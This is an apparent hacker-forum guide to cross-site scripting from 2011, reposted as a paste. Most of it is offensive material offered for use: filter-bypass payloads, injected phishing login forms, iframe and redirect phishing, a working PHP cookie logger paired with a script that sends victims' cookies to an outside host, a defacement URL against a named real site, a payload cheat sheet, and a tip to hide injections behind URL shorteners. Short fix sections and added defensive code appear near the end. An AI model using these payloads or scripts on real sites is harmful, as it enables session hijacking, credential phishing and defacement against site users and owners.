Untitled
a guest, Jun 1st, 2013
Guide Book on Cross Site Scripting

// Best Viewed in Notepad++ with word wrap enabled :)


A Tribute To My Mother Land

" INDIA "


**********************************************************
We should be thankful and remember the bravery of Maharaja
Prithvi Raj Chauhan, Maharana Pratap, Chandra Shekhar Azad,
Bhagat Singh, Rajguru, Sukhdev and all those who gave
their lives for the sake of freedom and sanctity of the
land named Hindustan (collectively India, Pakistan &
Bangladesh).

We might remember the intrepid spirit who raised an army
named “Azad Hind Fauj” from prisoners of World War II far
from India and fought for our freedom, The Great Subhash
Chandra Bose. Remember His Words of inspiration

“Tum mujhe khoon do, main tumhe azaadi doonga”

We might get inspired by their great lifestyles and follow
their thoughts.
**********************************************************



Important!... Warning!!!
The author does not take responsibility if anyone tries
these hacks against any organization or anything else that makes
him trespass security measures and brings him under
legal prosecution. These hacks are intended for the
improvement of security and for investigations by legal
security agencies. Educational institutions are
hereby requested to prevent their students
from using the tools provided in this paper against the
corporate world. This paper is a proof-of-concept and
must be treated as such.



<|-[___________________________________________________________________________]-|>
- -
- [ Cross Site scripting ] -
- By Ankit Anand [CrazyAnkit ] -
- -
<|-[___________________________________________________________________________]-|>


# Written On 26 March 2011
# Author : Ankit Anand
# [ [email protected] , ankitthehacker.wordpress.com ]
# Written For Indishell.in ; Hackerz5.com ; r00tp0is0n.in
# Greetz Fly Out to : RJ D Indian ,cyb3r_shubham , cyb3rs4m ,l0c4l r00t , LuCky , c00lt04d, reb0rn, 3thic4l n00b , darkw0lf , ne0

// Reference : Exploit-db , Aoh [Orkut] , Google ;)

--==+================================================================================+==--
--==+ Dedicated To My Loving parents +==--
--==+================================================================================+==--

=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x
Feel Free To Share This White paper , knowledge is for sharing , But Respect Author's Hardwork . Give Proper Credits !

=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
|--( I ]> Introduction
0x01: Introduction
0x02: Finding The xss Vulnerable Websites
0x03: Executing Xss Commands
0x04: Bypass techniques
0x05: Damages By Xss
\_ 1.) Inject a Phishing script
\_ 2.) Iframe Phishing
\_ 3.) Redirect Phishing
\_ 4.) Cookie stealing
\_ 5.) Defacing
\_ Xss Cheat Sheet
0x06 : Fixing Xss Holes
0x07: [The End]
|_| Conclusions


<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>


---------------------
0x01: Introduction :
---------------------

XSS is also termed CSS, but no, it is not Cascading Style Sheets. XSS is an abbreviation for cross site scripting. From the title itself it is clear that XSS is related to scripts, to be precise JavaScript. XSS is a very common attack found in web applications. XSS allows the attacker to INSERT malicious code: the attacker injects his malicious script into a website, and the victim's browser just runs the code or script. XSS flaws come up every time a website doesn't filter the attacker's input.

There are many types of XSS attacks; I will mention the 3 most used.

The first attack I want to talk about is 'URL XSS'. This means that the XSS won't stay on the page;
it will only get executed if you have the malicious code in the URL and submit that URL.
We will talk more on how to use this to our advantage.

The second attack is input fields. Wherever you can insert data, it is very common to be XSS
vulnerable. For example, say we found a site with a search engine. Now in the search box you enter
'hacker' and hit enter; when the page loads, if it shows your data like 'Found 100 Results For hacker',
you see it is displaying our data on the page. Now what if we can execute code? There is no possible
way to execute PHP code in this attack, but there certainly is for HTML and JavaScript. But be aware this method
also won't stay on the server; this is for your eyes only.

The third attack: with this attack you will be able to INSERT data (code) and it will stay on the website.
Now there are 2 kinds, depending on whether we can execute PHP or HTML. If we can inject PHP then we can also
inject HTML, but NOT vice versa. This kind of attack is normally found on blogs, shoutboxes, profiles,
forums, just most places where you insert data and it stays there. Now HTML is totally different from PHP:
HTML downloads to your PC and then your browser parses/interprets the code (that's why its source is viewable).
With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser.
PHP injection is rare, but it doesn't hurt to try. Note: PHP code can't be injected into an HTML page !!!



------------------------------------------
0x02: Finding The xss Vulnerable Websites :
------------------------------------------
This won't be a tedious task if you have a good eye !
It is not really a big issue UNLESS it is permanent! Most of the websites you come across are vulnerable; the thing you need to have is just good knowledge about how to bypass the filtering. Well, there are many techniques, like
magic_quotes_gpc=ON bypass
HEX encoding
Obfuscation
Trying around
I will discuss them later !!

To kick off finding XSS vulnerable sites you can check blogs, forums, comment boxes, shout boxes and any kind of input boxes !! Don't worry, Google will help us find the websites. Using the Google dork inurl:"search.php?q=" we can get a list of common websites; you can now try them !!
-------------------------------
0x03 : Executing Xss Commands
-------------------------------

Injecting an XSS script is an easy task; as said above, you just have to look for an input box !!

Let's say this is how a simple, unsecured search function looks.

A vulnerable code would be:


<?php

// Whatever was submitted is taken as-is: no filtering, no escaping
$message = $_POST['message'];

if (isset($_POST['message']))
{

echo "Thank you, your message has been posted!";

echo "<br />";

echo $message;   // the raw input is written straight into the page
}

echo "
<form method='post' name='message_box'>
<input type='text' name='message'>
<input type='submit' name='submit'>
</form>";

?>



Ok, so now a malicious user could do the following:

Submit the following text to test for vulnerability:


<script>alert("xss")</script>



or


<h1>Nice Website!</h1>



IF the HTML gets parsed (and it will in this code), the attacker will now move to the next step, which is logging the page, by redirecting it to a logger.

Some methods of bypassing some filters: for example, if the form only submits links, let's take this one as an example:




<?php

$message = $_POST['message'];

if (isset($_POST['message']))
{

echo "Thank you, your link has been added!";

echo "<br />";

// The input lands inside a single-quoted href attribute, still unescaped
echo "<a href='$message'>Link</a>";
}

echo "
<form method='post' name='message_box'>
<input type='text' name='message'>
<input type='submit' name='submit'>
</form>";

?>

Now that should not parse anything, but simply wrap it in a link, right?

Well, I don't think so; you can simply bypass it using:



'> <script>alert("owned")</script>



Why does that bypass it?!

Here is what happens: the


'>


will close the a tag, and then you can open anything else...

Here is the result:


<a href=''> <script>alert("owned")</script>'>Link</a>



As you can see, the a tag got closed, which allowed me to open another tag, which is a script here. And it works :)


---------------------------------------------
0x04 : Bypass techniques
---------------------------------------------

As said in section 0x02, here I am going to discuss bypass techniques :)


There are a lot of ways to bypass XSS filters on websites; I'll number some:

\_ 1.) magic_quotes_gpc=ON bypass
\_ 2.) HEX encoding
\_ 3.) Obfuscation
\_ 4.) Trying around

1.) magic_quotes_gpc=ON is a PHP setting (php.ini).
It causes every ' (single quote), " (double quote) and \ (backslash)
to be escaped with a backslash automatically. It's also a well known method
to avoid XSS flaws, although it's exploitable.

How to bypass it when it's ON? Use the JavaScript function called
String.fromCharCode(): just convert your text into decimal character codes
(e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the call,
so the script needs no quote characters at all.

Using "ankit" (without quote signs) will look like this:

String.fromCharCode(97, 110, 107, 105, 116)

Now insert this in your alert script:

www.site.ru/google.php?search=<script>alert(String.fromCharCode(97, 110, 107, 105,116));</script>

2.) HEX encoding is a useful bypass method, too. Using this step will encode
your script, so you can't see clearly at first look what the code will do.
This is how

<script>alert(/turtles/);</script>

looks when URL-encoded in HEX:

www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E

3.) Obfuscation: sometimes website administrators simply put words like
"script", "alert()", "''" on a "badwords list". That means, when you
search for "script" on the website, it just shows you an error like
"you are not allowed to search for this word" or something.
But this is a weak protection; you can bypass it by obfuscating
your JavaScript code, like:
<sCrIpT>alert('turtles');</ScRiPt>

There are like unlimited possibilities, but that leads us to the
next chapter...

4.) Trying around: sometimes you just have to try around, because every website
is secured/unsecured in a different, unique way. Some don't even use
cookies, for example. Always keep a look at the website's source code!
Sometimes you need to adjust your XSS script, like:

"><script>alert(/ankit/);</script>

You need this sometimes if you injected your code into a search box, e.g., and
it lands inside an HTML tag, so you first need to close that tag, then start a new
tag (<script>...).

Anyway, there are lots of different methods to bypass XSS filtering;
try around !

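A defender-side counterpart to the bypasses above, added as an editor's example (not code from the original paper): the request target is normalised the same way the bypasses obscure it (percent decoding for the HEX trick, case folding for <sCrIpT>, control-character stripping for the split "jav ascript" forms in the cheat sheet) before any signature is matched, and constructed access-log lines are scanned. Function names and the log lines are the editor's own; the addresses are documentation-range placeholders.

```php
<?php
// Editor's example: normalise request URLs before signature matching so the
// section 0x04 bypasses (HEX/percent encoding, mixed-case tags, fromCharCode)
// are seen in their decoded form. Function names are the editor's own.

function normalise_request(string $url): string
{
    // Decode up to three times: some payloads are double percent-encoded.
    $decoded = $url;
    for ($i = 0; $i < 3; $i++) {
        $next = urldecode($decoded);   // also turns '+' into a space
        if ($next === $decoded) {
            break;
        }
        $decoded = $next;
    }
    // Case folding defeats <sCrIpT>; dropping control characters rejoins
    // "jav<TAB>ascript:" style splits that browsers still execute.
    $decoded = strtolower($decoded);
    return preg_replace('/[\x00-\x1f]+/', '', $decoded) ?? $decoded;
}

function xss_indicators(string $url): array
{
    $n = normalise_request($url);
    $signatures = [
        'script_tag'    => '/<\/?script\b/',
        'js_scheme'     => '/javascript\s*:/',
        'from_charcode' => '/fromcharcode\s*\(/',
        'frame_embed'   => '/<(iframe|embed|meta)\b/',
        'attr_breakout' => '/[\'"]\s*>\s*</',        // the '> trick from 0x03
        'event_handler' => '/[\s\/\'"]on[a-z]+\s*=/',
    ];
    $hits = [];
    foreach ($signatures as $name => $pattern) {
        if (preg_match($pattern, $n) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Pulls the request target out of a combined-format access log line and
// returns the indicator names that fire, or [] for a clean request.
function scan_log_line(string $line): array
{
    if (preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m) !== 1) {
        return [];
    }
    return xss_indicators($m[1]);
}

// Constructed sample lines (addresses are documentation-range placeholders).
$sample_log = [
    '203.0.113.7 - - [26/Mar/2011:10:00:00 +0530] "GET /google.php?search=turtles HTTP/1.1" 200 512',
    '203.0.113.7 - - [26/Mar/2011:10:00:05 +0530] "GET /google.php?search='
        . '%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E HTTP/1.1" 200 700',
    '203.0.113.8 - - [26/Mar/2011:10:00:09 +0530] "GET /google.php?search='
        . '%3CsCrIpT%3Ealert(String.fromCharCode(97,110,107,105,116))%3C/ScRiPt%3E HTTP/1.1" 200 700',
    '203.0.113.9 - - [26/Mar/2011:10:00:12 +0530] "GET /google.php?search='
        . '%27%3E+%3Cscript%3Ealert(%22owned%22)%3C/script%3E HTTP/1.1" 200 700',
];

foreach ($sample_log as $line) {
    $hits = scan_log_line($line);
    echo ($hits ? 'ALERT ' . implode(',', $hits) : 'clean'), ' : ', $line, "\n";
}
```

The first line reports clean; the other three report script_tag, with from_charcode and attr_breakout added for the third and fourth respectively.
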
--------------------
0x05: Damages By Xss
--------------------


So far I have elaborated on XSS and its basics. I showed you how to spawn a JavaScript alert message on a website. Now let's concentrate on what havoc XSS can bring if the site is vulnerable to XSS. If you are still thinking XSS is useless and just for showing off, think again :) .. Let me remind you: Twitter, Facebook, Orkut, NDTV, BSNL have all been heavily affected by XSS and its sub-methods. Here are some attack techniques you can carry out with an XSS flaw:

1.) Inject a Phishing script
2.) Iframe Phishing
3.) Redirect Phishing
4.) Cookie stealing
5.) Defacing



---------------------------
\_ 1.) Injecting A phishing page :
---------------------------

Assuming you are aware of what the heck phishing is [ no, it's not fishing :P, but kind of related to it ]
Phishing script injection: just inject a 'user' and 'password' field in HTML
(with the <html> and <body> tags), so that the victim may think he needs to log in to the target site.

Here is an example:

www.site.com/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.com/phishingscript.php">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>

You can carry your operation on this


|======================|
| http://www.gamez.pk/ |
|======================|


Content of phishingscript.php:

<?php
// Keys must match the form's field names exactly: $_POST keys are case-sensitive
$login = $_POST['User'];
$password = $_POST['Password'];
$open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
fclose($open);
?>



---------------
\_ 2.) Iframe Phishing
---------------
Iframe Phishing: simple thing, just inject a JavaScript code containing an iframe where your phishing site is embedded. Obviously it needs to look just like the target site.

Here is an example:

www.site.com/google.php?search=<iframe src="http://www.yourphishingsite.com" height="100%" width="100%"></iframe>

(Note: height="100%" width="100%" means that the whole window is filled with
that iframe.)
The target site will spawn your phishing site in an iframe, and the website users / victims won't see a
difference and will log in (if they are foolish enough).



--------------------
\_ 3.) Redirection Phishing:
--------------------
Also simple, just inject a JavaScript redirection script that leads to your phishing site; of course it needs to look just like the target site.

Here is an example:

www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>

or

www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://www.yourphishingsite.ru">



----------------
\_ 4.) Cookie Stealing
----------------

I decided to add this part, as I have seen a lot of papers, ebooks and articles not covering this part, and if they do add it, it's not clear to the readers, so here it is :)

It's the most useful and vital part of XSS. You just have to put your cookie logger script on your webspace and insert JavaScript into the XSS vulnerable site with the cookie logger script's address :) The rest the script will do; you will get the cookies to eat with tea/coffee :P ..



<?php

// Best-effort client address, checking proxy headers before REMOTE_ADDR
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}

// Appends one line per request; the query string is whatever the injected script sent
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_globals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['REQUEST_METHOD'];
$rem_host = isset($_SERVER['REMOTE_HOST']) ? $_SERVER['REMOTE_HOST'] : '';
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie <br><br>\n");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}

logData();

?>


Above is the cookie logger script. Make a log.txt and put both of them on your webspace and set "chmod 777".
Inject the following code in your target website:

http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>

// Obviously you have to rename the script :) .. use a name that seems less suspicious :O

Now as soon as the user visits the page, the victim's cookie will be trapped in your log file. Once you have got the cookies you can hijack their session :)

// You can use Firefox addons; maybe available for Chrome too :)



--------
\_ 5.) Defacing
--------

Well, now that you understand how XSS works, we can explain some simple XSS deface methods. There
are many ways of defacing; I will mention some of the best and most used.

The first one is IMG SRC. Now for those of you who don't know HTML, IMG SRC is a tag that
displays the IMAGE linked to it on the webpage.

<b>xSsed by Ankit</b><head><body><IMG SRC="site.com/jpg" width= 700 height= 700></body></head>

Example ::

http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cb%3ExSsed%20by%20CrazyAnkit%3C/b%3E%3Chead%3E%3Cbody%3E%3CIMG%20SRC=%22http://ploader.net/files/87be7175082785f6e890497951c61ebc.jpg%22%20width=%20700%20height=%20700%3E%3C/body%3E%3C/head%3E





The other tags are not needed, as the page will already have them (in rare cases it will not).

Ok, it helps to make your picture big so it stands out and it's clear the site got hacked.

Another method is using FLASH videos; it's the same as the method above but a more stylish deface.

<EMBED SRC="http://site.com/xss.swf">

That will execute the flash video linked to it.

Or maybe using a pop-up or redirection?

<SCRIPT>alert("Ankit Z here")</SCRIPT> // pop up

<script>window.open( "http://www.google.com/" )</script> // redirection

There are tons of others too; I will add them in the next section "Xss : Cheat sheet". The depth is too much; I would have to write another paper for the cheat sheet.

<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
Cheat Sheets
<~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>

Here is the XSS cheat sheet; I got most of these from http://ha.ckers.org/xss.html.
Enjoy. !!

'';!--"<XSS>=&{()}

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav
ascript:alert('XSS');">

#############################################################
# #
# PROTIP FOR EVERY XSS INJECTION: #
# use url shortener services such as tinyurl.com or bit.ly #
# to 'hide' your injection, so the victim won't know what's #
# behind that url. #
# #
#############################################################



==xx==xx==xx==xx==xx==




----------------
0x06 : Fixing Xss Holes
----------------


This section is written for developers, I mean web developers ;) . I will introduce, with facts, how you can secure your code.
Well, I found this section to be the most mind bending; still I have written the best I can .. [I am not good at explaining things !!]

Please go to this URL for more info about this:

####################################################################################
http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
####################################################################################


Well, leaving useless talk, let's talk about XSS prevention :)

If you found XSS bugs in your scripts, it's easy to secure them; take a look at the code below:

if(isset($_POST['form'])){echo "<html><body>" .$_POST['form']. "</body></html>";}

Ok, say the variable $_POST['form'] was coming from an input box; then you have an XSS attack.
The following is a very easy way to secure that:

$charset = 'UTF-8';
if (isset($_POST['form'])) {
    // htmlentities() turns < > & into entities, so injected tags render as text
    $data = htmlentities($_POST['form'], ENT_NOQUOTES, $charset);
    echo "<html><body>" . $data . "</body></html>";
}

Now that will take all possible code and make it not executable, by turning it into stuff like
&lt; etc...

You will not notice a difference when using htmlentities();

There is also another common function, strip_tags(); find more info at php.net/strip_tags

Ok, another way: to show you how to secure INTEGER variables (variables that will always contain an INT):

$id = $_GET['id'];
echo "you are viewing " . $id . " blog";

Now if we include ?id=<script>alert("XSS")</script>
into the URL it's gonna execute our code. A very easy way to secure this is using (int); check the following code:

$id = (int)$_GET['id'];   // the cast leaves nothing but digits to echo
echo "you are viewing " . $id . " blog";

Now if at any time the variable contains anything but an integer, it will return 0.

That's enough said. huh !!

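An editor's example (not code from the paper) that hardens the two sinks shown here, the <a href='$message'> echo from 0x03 and the $_GET['id'] echo above, together with the cookie flags that blunt the document.cookie logger of 0x05; it shows why ENT_NOQUOTES is not enough inside an attribute (' and " stay raw, so the '> breakout still works there) and why a URL attribute also needs a scheme check. Function names are the editor's own.

```php
<?php
// Editor's example (not from the original paper): context-aware fixes for the
// sinks shown in sections 0x03 and 0x06. Function names are the editor's own.

// 0x03 sink: user input inside <a href='...'>. ENT_NOQUOTES leaves quotes
// alone, so '> would still close the attribute; ENT_QUOTES encodes ' and ".
function safe_link(string $message): string
{
    // Escaping does nothing against javascript: URLs, which need no quote
    // to run, so only http(s) schemes are accepted at all.
    $url = trim($message);
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!in_array(strtolower((string) $scheme), ['http', 'https'], true)) {
        return 'Rejected: only http:// and https:// links are accepted.';
    }
    $escaped = htmlspecialchars($url, ENT_QUOTES, 'UTF-8');
    return "<a href='" . $escaped . "'>Link</a>";
}

// 0x06 body-text sink: here ENT_NOQUOTES is sufficient, because < and > are
// encoded, but encoding quotes as well costs nothing and keeps one rule.
function safe_body(string $form): string
{
    $data = htmlentities($form, ENT_QUOTES, 'UTF-8');
    return "<html><body>" . $data . "</body></html>";
}

// 0x06 integer sink. (int) turns "<script>" into 0 but "12abc" into 12, so
// the raw value is validated as digits only and a non-positive id is refused.
function blog_view_line(string $rawId): string
{
    if (!ctype_digit($rawId) || (int) $rawId <= 0) {
        return 'Invalid blog id.';
    }
    return "you are viewing " . (int) $rawId . " blog";
}

// 0x05 defence: a session cookie flagged HttpOnly never appears in
// document.cookie, so the logger URL receives an empty value.
// Call before session_start().
function harden_session_cookie(): void
{
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_secure', '1');     // never sent over plain http
    ini_set('session.use_only_cookies', '1');  // no session id in the URL
}

// Demonstration with the paper's own payloads and one legitimate value each.
$links = ["'> <script>alert(\"owned\")</script>", 'javascript:alert(1)',
          "http://example.com/page?a=1&b='x'"];
foreach ($links as $l) {
    echo safe_link($l), "\n";
}
echo safe_body('<script>alert("XSS")</script>'), "\n";
echo blog_view_line('<script>alert("XSS")</script>'), "\n";
echo blog_view_line('12abc'), "\n";
echo blog_view_line('7'), "\n";
```

The first two links are rejected outright; the third renders with & and the single quotes entity-encoded, so the attribute cannot be closed from inside the value.
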
--------------------------------------
0x07: XSS The Complete Walkthrough [The End]
--------------------------------------
|_| Conclusions

Well, I have talked about XSS !! I hope you have enjoyed my paper a lot while reading, like I enjoyed [ believe me, I am lying lol !! :D]

If you got any questions mail me @ [email protected]

I still have not included many topics in my paper, like clickjacking with XSS and vbSEO – From XSS to Reverse PHP Shell :P and a few more :)
I will write a separate paper on XSS prevention later on :)

This is a very cute attack; enjoy it at its best !!





*************